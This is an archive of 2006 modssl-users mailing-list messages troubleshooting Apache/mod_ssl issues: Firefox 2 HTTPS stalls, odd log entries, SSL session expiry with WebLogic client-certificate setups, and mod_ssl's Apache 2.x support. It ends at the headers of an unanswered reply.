Received: from adrian by hades.smop.co.uk with local (Exim 4.63)
	(envelope-from )
	id 1Gpt1V-0002Bi-MV
	for modssl-users@modssl.org; Thu, 30 Nov 2006 21:00:49 +0000
Date: Thu, 30 Nov 2006 21:00:49 +0000
To: modssl-users@modssl.org
Subject: firefox 2 (but not 1.5) hangs with https
Message-ID: <20061130210049.GA8336@smop.co.uk>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.5.13 (2006-08-11)
From: Adrian Bridgett 
X-smop.co.uk-MailScanner: Found to be clean
X-smop.co.uk-MailScanner-SpamCheck: not spam, SpamAssassin (score=-2.6,
	required 5, autolearn=not spam, BAYES_00 -2.60, NO_RELAYS -0.00)
X-smop.co.uk-MailScanner-From: adrian@smop.co.uk
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Adrian Bridgett 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I've been banging my head for a day or so on this.  We have a website
and when I surf it with firefox 2.0, I see a bunch of requests, then a
large gap when nothing happens, then another bunch of request, then a
gap.  I can't think what different on this setup as to why I can't see
other people reporting the same thing.   We only noticed it recently,
although that's not to say that it wasn't there before.  I've gone
through all the FAQs and google searches I can think of :(

This worked okay on firefox 1.5 (1.5.dfsg+1.5.0.7-2 from debian), but
we've also seen this behaviour on MSIE (7.0 I think).  

The gaps are as long as KeepAliveTimeout is set to in apache.conf
(15sec normally) if I change it to 5 seconds then the gaps also drop to
5 seconds.  The file in question is always a flash (.swf) file, the
request times I see are like this:

17:22:28
17:22:29
17:22:30
17:22:31
17:22:46
17:23:01
17:23:16
(every 15secs until page is loaded)

The server is Debian stable, completely up to date, I've tried
everything I can find:

 - SSLRandomSeed was set to urandom (startup) and builtin (connect)
 I've tried setting this to both urandom and builtin across the board

 - I've changed the Sessioncache from dbm to shmcb, shmht, none

 - I've removed some external URLs which were occuring and that's not
   helped at all either.

 - I've tried matching the User-Agent and turning off keepalive, all
   three shutdowns, etc. 

Apache - /2.0.54
openssl - 0.9.7e-3sarge4

With info level debugging I'm seeing this:
[Thu Nov 30 10:16:22 2006] [info] (70007)The timeout specified has
expired: SSL input filter read failed.  (lots!)
....
[Thu Nov 30 17:22:31 2006] [info] (104)Connection reset by peer:
core_output_filter: writing data to the network
[Thu Nov 30 17:22:31 2006] [info] (104)Connection reset by peer: SSL
output filter write failed.
[Thu Nov 30 17:22:32 2006] [info] (104)Connection reset by peer:
core_output_filter: writing data to the network
[Thu Nov 30 17:22:32 2006] [info] (104)Connection reset by peer: SSL
output filter write failed.
[Thu Nov 30 17:22:42 2006] [info] (70014)End of file found: SSL input
filter read failed.

Other message which might explain things are:
[Thu Nov 30 17:22:31 2006] [info] Connection to child 1 established
(server staging.truphone.com:443, client 81.5.177.202)
[Thu Nov 30 17:23:23 2006] [info] Connection to child 1 established
(server staging.truphone.com:443, client 84.65.175.231)

(no messages about it being shutdown in the middle - done silently in
those error messages?)

One last log which is probably a little clearer.  I've turned off
keepalive, pipelining, set all requests to 1 on the browser:

[Thu Nov 30 18:29:19 2006] [info] Connection to child 6 established
(server staging.truphone.com:443, client 81.5.177.202)
[Thu Nov 30 18:29:19 2006] [info] Seeding PRNG with 512 bytes of entropy
[Thu Nov 30 18:29:19 2006] [info] Connection to child 6 closed with
standard shutdown(server staging.truphone.com:443, client 81.5.177.202)
[Thu Nov 30 18:29:19 2006] [info] Connection to child 3 established
(server staging.truphone.com:443, client 81.5.177.202)
[Thu Nov 30 18:29:19 2006] [info] Seeding PRNG with 512 bytes of entropy
[Thu Nov 30 18:29:20 2006] [info] Connection to child 3 closed with
standard shutdown(server staging.truphone.com:443, client 81.5.177.202)
[Thu Nov 30 18:29:20 2006] [info] Connection to child 8 established
(server staging.truphone.com:443, client 81.5.177.202)
[Thu Nov 30 18:29:20 2006] [info] Seeding PRNG with 512 bytes of entropy
<< now the browser sits waiting, no network traffic >>
[Thu Nov 30 18:29:35 2006] [info] Connection to child 8 closed with
standard shutdown(server staging.truphone.com:443, client 81.5.177.202)
[Thu Nov 30 18:29:35 2006] [info] Connection to child 1 established
(server staging.truphone.com:443, client 81.5.177.202)
[Thu Nov 30 18:29:35 2006] [info] Seeding PRNG with 512 bytes of entropy
<< data is transferred, then waiting browser, no traffic >>
[Thu Nov 30 18:29:50 2006] [info] Connection to child 1 closed with
standard shutdown(server staging.truphone.com:443, client 81.5.177.202)

So the session seems to be used, but instead of being reused, the
browser sits there, eventually the server kills the session and the
browser then continues..

Is there a way I can sniff the TLS/SSL traffic?  I've tried ssldump
but it looks like it only works with certain ciphers.

Any suggestion as to other things to try would be most appeciated!

Many thanks,

Adrian 
-- 
Adrian Bridgett - adrian@smop.co.uk
GPG key available on public key servers
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Dec  1 14:42:23 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id C196014D9DF; Fri,  1 Dec 2006 14:42:23 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from hades.smop.co.uk (smop.co.uk [81.5.177.201])
	by master.modssl.org (Postfix) with ESMTP id 7C92C14D835
	for ; Fri,  1 Dec 2006 14:42:23 +0100 (CET)
Received: from adrian by hades.smop.co.uk with local (Exim 4.63)
	(envelope-from )
	id 1Gq8jt-0000o7-4U
	for modssl-users@modssl.org; Fri, 01 Dec 2006 13:47:41 +0000
Date: Fri, 1 Dec 2006 13:47:41 +0000
To: modssl-users@modssl.org
Subject: Re: firefox 2 (but not 1.5) hangs with https
Message-ID: <20061201134741.GA1095@smop.co.uk>
References: <20061130210049.GA8336@smop.co.uk>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <20061130210049.GA8336@smop.co.uk>
User-Agent: Mutt/1.5.13 (2006-08-11)
From: Adrian Bridgett 
X-smop.co.uk-MailScanner: Found to be clean
X-smop.co.uk-MailScanner-SpamCheck: not spam, SpamAssassin (score=-2.6,
	required 5, autolearn=not spam, AWL 0.00, BAYES_00 -2.60,
	NO_RELAYS -0.00)
X-smop.co.uk-MailScanner-From: adrian@smop.co.uk
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Adrian Bridgett 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Thu, Nov 30, 2006 at 21:00:49 +0000 (+0000), adrian wrote:
[snip]
> The gaps are as long as KeepAliveTimeout is set to in apache.conf
> (15sec normally) if I change it to 5 seconds then the gaps also drop to
> 5 seconds.  The file in question is always a flash (.swf) file, the
> request times I see are like this:

I think that bit was sheer luck, it seems to be unrelated (which makes
more sense since I've turned KA off to try and debug what's going on.

I've changed all my browser settings down to the bare minimum - no
persistent connections, 1 connection at once, no pipelining etc.

What I can see is after the initial syn, syn/ack, ack from the
browser, there is a typically just under 15s wait until it sends
Client Hello.

I wondered if this was due to lack of entropy so I've symlinked
/dev/random to /dev/urandom temporarily (no help), and I've tried
wiggling the mouse around (not sure where firefox gets randomness
from).  This hasn't helped either.

OTOH I'm suprised no-one else has seen this, but since the file in
question is .swf fetched via javascript, maybe that's why?   Trying a
dummy page with just 50 images on it, the client hello is always
instantaneous.

Very puzzling (well to me at least :-))

Adrian 
-- 
Adrian Bridgett - adrian@smop.co.uk
GPG key available on public key servers
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Dec  4 07:43:52 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id F2D5114D890; Mon,  4 Dec 2006 07:43:51 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from nz-out-0102.google.com (nz-out-0506.google.com [64.233.162.228])
	by master.modssl.org (Postfix) with ESMTP id 8446014D84B
	for ; Mon,  4 Dec 2006 07:43:51 +0100 (CET)
Received: by nz-out-0102.google.com with SMTP id o37so2129353nzf
        for ; Sun, 03 Dec 2006 22:43:28 -0800 (PST)
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
        s=beta; d=gmail.com;
        h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references;
        b=SV8ANjEiwn93Zppmu/UrKtUeOnmutjvcqGhOUFMflyn/SgD3CgiL4diAzMqMSqtz4mRwRTfyluvwBM3yRdiY8cjmCZSRqRigEjTJ5WUYkBoLP7qOiJAlssFRRROvb/sY2Z8UOlAJr4tV4qe20bVkcImANrXulROxqeQ82HMdyJA=
Received: by 10.65.204.7 with SMTP id g7mr11518802qbq.1165214607875;
        Sun, 03 Dec 2006 22:43:27 -0800 (PST)
Received: by 10.65.230.12 with HTTP; Sun, 3 Dec 2006 22:43:27 -0800 (PST)
Message-ID: <740f716a0612032243y750a9918m7c7f243453019b17@mail.gmail.com>
Date: Sun, 3 Dec 2006 22:43:27 -0800
From: "Yvo van Doorn" 
To: modssl-users@modssl.org
Subject: Re: SSL access from my apache.
In-Reply-To: <200611300305.AA00270@POLYMER5.scphys.kyoto-u.ac.jp>
MIME-Version: 1.0
Content-Type: multipart/alternative; 
	boundary="----=_Part_25414_8625954.1165214607840"
References: <200611300305.AA00270@POLYMER5.scphys.kyoto-u.ac.jp>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Yvo van Doorn" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

------=_Part_25414_8625954.1165214607840
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

You'll probably have better luck going to the httpd users mailing list
(found at http://httpd.apache.org) as opposed to this one as this mod_ssl is
developed for apache 1.x not apache 2.x

On 11/29/06, Tsurutani Naoki  wrote:
>
> Hi,
>
> I have a question about ssl_engine_io.c.
> On my system of FreeBSD 6-STABLE, apache with following signature is
> working :
>         "Apache/2.2.3 (FreeBSD) mod_ssl/2.2.3 OpenSSL/0.9.7e-p1 DAV/2
> PHP/4.4.4
>          with Suhosin-Patch configured".
> I found some log entries like
>         localhost - - [29/Nov/2006:09:54:01 +0900] "GET /" 400 653 "-" "-"
>         localhost - - [29/Nov/2006:09:54:02 +0900] "GET /" 400 653 "-" "-"
>         localhost - - [29/Nov/2006:09:54:03 +0900] "GET /" 400 653 "-" "-"
>         localhost - - [29/Nov/2006:10:43:04 +0900] "GET /" 400 653 "-" "-"
> in my log file about ssl access. These entries are not found in normal
> http access log.
> This is caused by ssl_io_filter_disable() function in
> modules/ssl/ssl_engine_io.c,
> as I think, and I have no idea why these accesses are necessary.
> Referencing to http access log, many accesses are found just before this
> log's timestamp,
> but they were not about ssl (I checked firewall log and found no entries
> about tcp/443).
> These logs were not found with apache-2.0.x before 1 year ago.
>
> I want to know why this access occures.
> Please tell me.
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>

------=_Part_25414_8625954.1165214607840
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

You'll probably have better luck going to the httpd users mailing list (found at http://httpd.apache.org) as opposed to this one as this mod_ssl is developed for apache 1.x not apache 
2.x 

On 11/29/06, Tsurutani Naoki <turutani@scphys.kyoto-u.ac.jp> wrote:

Hi,

I have a question about ssl_engine_io.c.
On my system of FreeBSD 6-STABLE, apache with following signature is working :
        "Apache/2.2.3 (FreeBSD) mod_ssl/2.2.3 OpenSSL/0.9.7e-p1 DAV/2 PHP/4.4.4

         with Suhosin-Patch configured".
I found some log entries like
        localhost - - [29/Nov/2006:09:54:01 +0900] "GET /" 400 653 "-" "-"
        localhost - - [29/Nov/2006:09:54:02 +0900] "GET /" 400 653 "-" "-"

        localhost - - [29/Nov/2006:09:54:03 +0900] "GET /" 400 653 "-" "-"
        localhost - - [29/Nov/2006:10:43:04 +0900] "GET /" 400 653 "-" "-"
in my log file about ssl access. These entries are not found in normal http access log.

This is caused by ssl_io_filter_disable() function in modules/ssl/ssl_engine_io.c,
as I think, and I have no idea why these accesses are necessary.
Referencing to http access log, many accesses are found just before this log's timestamp,

but they were not about ssl (I checked firewall log and found no entries about tcp/443).
These logs were not found with apache-2.0.x before 1 year ago.

I want to know why this access occures.
Please tell me.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      
modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org



------=_Part_25414_8625954.1165214607840--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Dec  4 09:37:11 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 60F1714D894; Mon,  4 Dec 2006 09:37:11 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from hades.smop.co.uk (smop.co.uk [81.5.177.201])
	by master.modssl.org (Postfix) with ESMTP id 1980A14D84B
	for ; Mon,  4 Dec 2006 09:37:10 +0100 (CET)
Received: from adrian by hades.smop.co.uk with local (Exim 4.63)
	(envelope-from )
	id 1Gr9PX-0002MD-Q5
	for modssl-users@modssl.org; Mon, 04 Dec 2006 08:42:51 +0000
Date: Mon, 4 Dec 2006 08:42:51 +0000
To: modssl-users@modssl.org
Subject: Re: SSL access from my apache.
Message-ID: <20061204084251.GA9037@smop.co.uk>
References: <200611300305.AA00270@POLYMER5.scphys.kyoto-u.ac.jp> <740f716a0612032243y750a9918m7c7f243453019b17@mail.gmail.com>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <740f716a0612032243y750a9918m7c7f243453019b17@mail.gmail.com>
User-Agent: Mutt/1.5.13 (2006-08-11)
From: Adrian Bridgett 
X-smop.co.uk-MailScanner: Found to be clean
X-smop.co.uk-MailScanner-SpamCheck: not spam, SpamAssassin (score=-2.6,
	required 5, autolearn=not spam, BAYES_00 -2.60, NO_RELAYS -0.00)
X-smop.co.uk-MailScanner-From: adrian@smop.co.uk
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Adrian Bridgett 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Sun, Dec  3, 2006 at 22:43:27 -0800 (-0800), Yvo van Doorn wrote:
> You'll probably have better luck going to the httpd users mailing 
> list
> (found at http://httpd.apache.org) as opposed to this one as this 
> mod_ssl is
> developed for apache 1.x not apache 2.x

Ah, many thanks!

Adrian 
-- 
Adrian Bridgett - adrian@smop.co.uk
GPG key available on public key servers
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Dec  4 10:18:43 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 269E514D89F; Mon,  4 Dec 2006 10:18:43 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from IMSSOUT1.minfin.be (gw.minfin.be [193.191.216.49])
	by master.modssl.org (Postfix) with ESMTP id E674014D84B
	for ; Mon,  4 Dec 2006 10:18:41 +0100 (CET)
Received: from finmfe3.minfin.fed.be ([10.2.31.15]) by IMSSOUT1.minfin.be with InterScan Message Security Suite; Mon, 04 Dec 2006 10:20:03 +0100
Received: from conversion-daemon.finmfe3.minfin.fed.be by finmfe3.minfin.fed.be
 (Sun Java System Messaging Server 6.2-1 (built Feb 24 2005))
 id <0J9Q00201S6SAT00@minfin.fed.be>
 (original mail from claude.libois@guest.minfin.fed.be)
 for modssl-users@modssl.org; Mon, 04 Dec 2006 10:18:16 +0100 (CET)
Received: from BEBRULiboisC ([10.12.2.181])
 by finmfe3.minfin.fed.be (Sun Java System Messaging Server 6.2-1 (built Feb 24
 2005)) with SMTP id <0J9Q00AI7SIDURB0@minfin.fed.be> for
 modssl-users@modssl.org; Mon, 04 Dec 2006 10:18:14 +0100 (CET)
Date: Mon, 04 Dec 2006 10:18:13 +0100
From: Claude Libois 
Subject: Re: How to notified application server that ssl session has expired.
To: modssl-users@modssl.org
Message-id: <007901c71785$1fcc7250$071d17ac@eu.uis.unisys.com>
MIME-version: 1.0
X-MIMEOLE: Produced By Microsoft MimeOLE V6.00.2900.2962
X-Mailer: Microsoft Outlook Express 6.00.2900.2180
Content-type: text/plain; reply-type=response; charset=iso-8859-1; format=flowed
Content-transfer-encoding: 7BIT
X-Priority: 3
X-MSMail-priority: Normal
References: <00e701c70cb5$9729c760$97020c0a@eu.uis.unisys.com>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Claude Libois 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Nobody to help me?
Claude
----- Original Message ----- 
From: "Claude Libois" 
To: 
Sent: Monday, November 20, 2006 4:07 PM
Subject: How to notified application server that ssl session has expired.


> Hello
> For our project we have integrated an electronical identity card( eID) 
> authentication. This card contains a certificate that is used to establish 
> an ssl two ways connection with our apache 2.0.54. This certificate is 
> validated by an OCSP server.
> When ssl connections is established, user's certificate is forwarded to a 
> J2EE application server (weblogic) which create it's own security context 
> throug a JAAS LoginModule.
> Our problem is that we have to (we don't have the choice)  unloged user 
> when ssl session has expired.
> So my problem is to notify weblogic that ssl session has expired.
> My first idea was to save SSL_SESSION_ID in my J2EE Principal and then 
> compare this id with the current ssl session id of the request.
> So if the current id is different than the id obtained during the 
> authentication process then the user is unloged.
> However, it seems that when I configure a virtualhost in ssl one 
> ways(SSLVerifyClient none) with a per-directory ssl two ways, sometimes my 
> ssl session is renewed and
> my ssl session id is different. If I configure two-ways at virtualhost 
> level this doesn't happen.
> Is there a problem for apache to maintains ssl session if we change the 
> ssl type?
> I read on an older post that we can't rely on SSL_SESSION_ID to know if 
> ssl has expired but I don't see any other way to notify my application 
> server.
> Any suggestion?
>
> Here is my ssl.conf.For information I have specific application apart from 
> the main application which is responsible of the authentication.
>
> AddType application/x-x509-ca-cert .crt
> AddType application/x-pkcs7-crl    .crl
> SSLSessionCache        shmcb:logs/ssl_scache(512000)
> SSLSessionCacheTimeout  300
> SSLMutex  file:/home/apache-2.0.54/logs/ssl_mutex
> SLRandomSeed startup builtin
> 
>      ServerName host
>      ServerAlias host
>      DocumentRoot "/home/apache-2.0.54/htdocs"
>      SSLEngine on
>      SSLCipherSuite -ALL:SSLv3+HIGH:-aNULL!EXPORT56:RC4+RSA
>      SSLProtocol -ALL +SSLv3 +TLSv1
>      # Server Certificate:
>      SSLCertificateFile 
> /home/apache-2.0.54/conf/ssl/certificate/server/host.cert
>      # Server Private Key:
>      SSLCertificateKeyFile 
> /home/apache-2.0.54/conf/ssl/certificate/server/privkey.key
>      SSLCertificateChainFile 
> "/home/apache-2.0.54/conf/ssl/certificate/chain/chain.pem
>      SSLOptions +StrictRequire +StdEnvVars +ExportCertData
>      RequestHeader add SSL_SESSION_ID "%{SSL_SESSION_ID}e"
>      SetEnvIf User-Agent ".*MSIE.*" ssl-unclean-shutdown
>      SSLVerifyClient  none
>      SSLCACertificateFile 
> "/home/weblogic/apache-2.0.54/conf/ssl/certificate/trusted_certificate/client-trusted-list.pem"
>    #Application that does the authentication
>    
>      SetHandler weblogic-handler
>     WebLogicCluster host:7001
>    
>    #main application that needs authentication
>    
>      SetHandler weblogic-handler
>     WebLogicCluster host:7001
>    
>    #Two-ways connection is only established when calling this struts 
> action
>      
>      SSLVerifyClient require
>      RequestHeader add WL-Proxy-SSL "true"
>      RequestHeader set SSL_CLIENT_CERT "%{SSL_CLIENT_CERT}e"
>      RequestHeader add SSL_CLIENT_S_DN "%{SSL_CLIENT_S_DN}e"
>      Allow from all
>       
>
>    
>
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 




----------------------------------------------------------------
- Disclaimer: http://www.minfin.fgov.be/disclaimer.htm
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Dec 12 16:25:27 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 5A84714D8AA; Tue, 12 Dec 2006 16:25:27 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from dmz-vsgate2.ldn.ibb.ubs.com (dmz-vsgate2.ldn.ibb.ubs.com [139.149.1.205])
	by master.modssl.org (Postfix) with ESMTP id 1BDDE14D82E
	for ; Tue, 12 Dec 2006 16:25:02 +0100 (CET)
Received: from sldn0848xmh.ldn.swissbank.com (localhost [127.0.0.1])
	by sldn0848xmh.ldn.swissbank.com (8.11.7+Sun/8.8.8) with ESMTP id kBCFOYa01846
	for ; Tue, 12 Dec 2006 15:24:34 GMT
Received: (from smap@localhost)
	by sldn0848xmh.ldn.swissbank.com (8.11.7+Sun/8.8.8) id kBCFOSn01562
	for ; Tue, 12 Dec 2006 15:24:28 GMT
Received: from  (inside [139.149.41.81]) by sldn0848xmh.ldn.swissbank.com via smap (V2.0b/ubs)
	id xma001381; Tue, 12 Dec 2006 15:24:13 GMT
Received: from nldn2376pap.ubsw.net (nldn2376pap.ldn.swissbank.com [14.64.49.25])
	by sldn0845pmh.ldn.swissbank.com (8.11.7+Sun/8.8.8) with ESMTP id kBCFO3X19738
	for ; Tue, 12 Dec 2006 15:24:03 GMT
From: Vishal.Sharma@ubs.com
Received: from NLDNC101PEX1.ubsw.net ([139.149.215.133]) by nldn2376pap.ubsw.net with Microsoft SMTPSVC(6.0.3790.1830);
	 Tue, 12 Dec 2006 15:24:02 +0000
X-MimeOLE: Produced By Microsoft Exchange V6.5
Content-class: urn:content-classes:message
MIME-Version: 1.0
Subject: Mod_ssl_error
Date: Tue, 12 Dec 2006 15:24:02 -0000
Message-ID: 
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: Mod_ssl_error
Thread-Index: AcceAY2HsNZap12qSwC6eMr0WXSW/w==
To: 
X-OriginalArrivalTime: 12 Dec 2006 15:24:02.0995 (UTC) FILETIME=[8E06A830:01C71E01]
X-UBSIB-Journal: yes
Content-Type: multipart/mixed; boundary="retimiled-emim-mijooneldraneldeen"
X-UBS-Disclaimer: Version $Revision: 1.27 $
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Vishal.Sharma@ubs.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


--retimiled-emim-mijooneldraneldeen
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C71E01.8E0C8B24"

This is a multi-part message in MIME format.

------_=_NextPart_001_01C71E01.8E0C8B24
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable

Hi,
This is with reference to module mod_ssl_error
http://marcstern.tripod.com/mod_ssl_error/ whose pupose is to
"certificate  error trapping". It was supposed to use with Apache patch
http://issues.apache.org/bugzilla/show_bug.cgi?id=3D35083. Has this =
module
been included as part of standard apache distribution ?

I need to do certificate validation as part of my project and this
module seems helpful in this regard.

Thanks,
Vishal


------_=_NextPart_001_01C71E01.8E0C8B24
Content-Type: text/html;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable






Mod_ssl_error





Hi,


This is with reference to module =
mod_ssl_error  http://marcstern.tripod.com/mod_ssl_error/<=
FONT SIZE=3D2 FACE=3D"Arial"> whose pupose is to "certificate  =
error trapping". It was supposed to use with Apache patch http://issues.apache.org/bugzilla/show_bug.cgi?id=3D35083<=
/FONT>. Has this module been =
included as part of standard apache distribution ?



I need to do certificate validation as =
part of my project and this module seems helpful in this regard.




Thanks,


Vishal





------_=_NextPart_001_01C71E01.8E0C8B24--

--retimiled-emim-mijooneldraneldeen
Content-Type: text/plain; charset=us-ascii; name="disclaim.txt"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Content-Description: Legal Disclaimer


Visit our website at http://www.ubs.com

This message contains confidential information and is intended only 
for the individual named.  If you are not the named addressee you 
should not disseminate, distribute or copy this e-mail.  Please 
notify the sender immediately by e-mail if you have received this 
e-mail by mistake and delete this e-mail from your system.

E-mail transmission cannot be guaranteed to be secure or error-free 
as information could be intercepted, corrupted, lost, destroyed, 
arrive late or incomplete, or contain viruses.  The sender therefore 
does not accept liability for any errors or omissions in the contents 
of this message which arise as a result of e-mail transmission.  If 
verification is required please request a hard-copy version.  This 
message is provided for informational purposes and should not be 
construed as a solicitation or offer to buy or sell any securities or 
related financial instruments.

--retimiled-emim-mijooneldraneldeen--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Dec 29 21:31:57 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 8A88614D858; Fri, 29 Dec 2006 21:31:57 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from nf-out-0910.google.com (nf-out-0910.google.com [64.233.182.185])
	by master.modssl.org (Postfix) with ESMTP id 320DF14D82B
	for ; Fri, 29 Dec 2006 21:31:56 +0100 (CET)
Received: by nf-out-0910.google.com with SMTP id p48so5319780nfa
        for ; Fri, 29 Dec 2006 12:31:32 -0800 (PST)
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
        s=beta; d=gmail.com;
        h=received:message-id:date:from:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition;
        b=UJYW/YGQWtESJbmCwBFYNMR+wmQvu5B6c0oEd66qOjlWWc2BGsThk/GkewZyaYEx5XUgj44dtkTARXRnhsNfQzzMDZ46n0a8l7pBtjcC1rmHNwp/upGPrlBENSfwKZacdFcIJCOqt63pp1oKZ6dhZu2MF2aaJM0gndrVlx5sx3I=
Received: by 10.82.184.2 with SMTP id h2mr1130069buf.1167424292695;
        Fri, 29 Dec 2006 12:31:32 -0800 (PST)
Received: by 10.82.186.15 with HTTP; Fri, 29 Dec 2006 12:31:32 -0800 (PST)
Message-ID: <7ac1e90c0612291231x2ecfabf7n2e1eccfe146efe2c@mail.gmail.com>
Date: Fri, 29 Dec 2006 20:31:32 +0000
From: "Bahadir Balban" 
To: modssl-users@modssl.org
Subject: mod_ssl for apache 2.x?
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Bahadir Balban" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi,

Does mod_ssl work on Apache 2.x? Why does it say mod_ssl is for 1.3 everywhere?

Is there any other ssl solution to apache 2.x?


Thanks,
Bahadir
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Dec 29 21:35:27 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 87DBF14D888; Fri, 29 Dec 2006 21:35:27 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from cr.toftum.org (cpe.atm2-0-76391.0x535ae692.bynxx16.customer.tele.dk [83.90.230.146])
	by master.modssl.org (Postfix) with ESMTP id 4E09B14D86D
	for ; Fri, 29 Dec 2006 21:35:26 +0100 (CET)
Received: from localhost (localhost [127.0.0.1])
	by cr.toftum.org (Postfix) with ESMTP id 5A0D9369B60
	for ; Fri, 29 Dec 2006 21:35:00 +0100 (CET)
X-Virus-Scanned: amavisd-new at toftum.dk
Received: from cr.toftum.org ([127.0.0.1])
	by localhost (cr.toftum.org [127.0.0.1]) (amavisd-new, port 10024)
	with ESMTP id yEXFnIaRx25F for ;
	Fri, 29 Dec 2006 21:34:48 +0100 (CET)
Received: by cr.toftum.org (Postfix, from userid 1000)
	id DE2DB366860; Fri, 29 Dec 2006 21:34:48 +0100 (CET)
Date: Fri, 29 Dec 2006 21:34:48 +0100
From: Mads Toftum 
To: modssl-users@modssl.org
Subject: Re: mod_ssl for apache 2.x?
Message-ID: <20061229203448.GR3539@cr>
Mail-Followup-To: modssl-users@modssl.org
References: <7ac1e90c0612291231x2ecfabf7n2e1eccfe146efe2c@mail.gmail.com>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
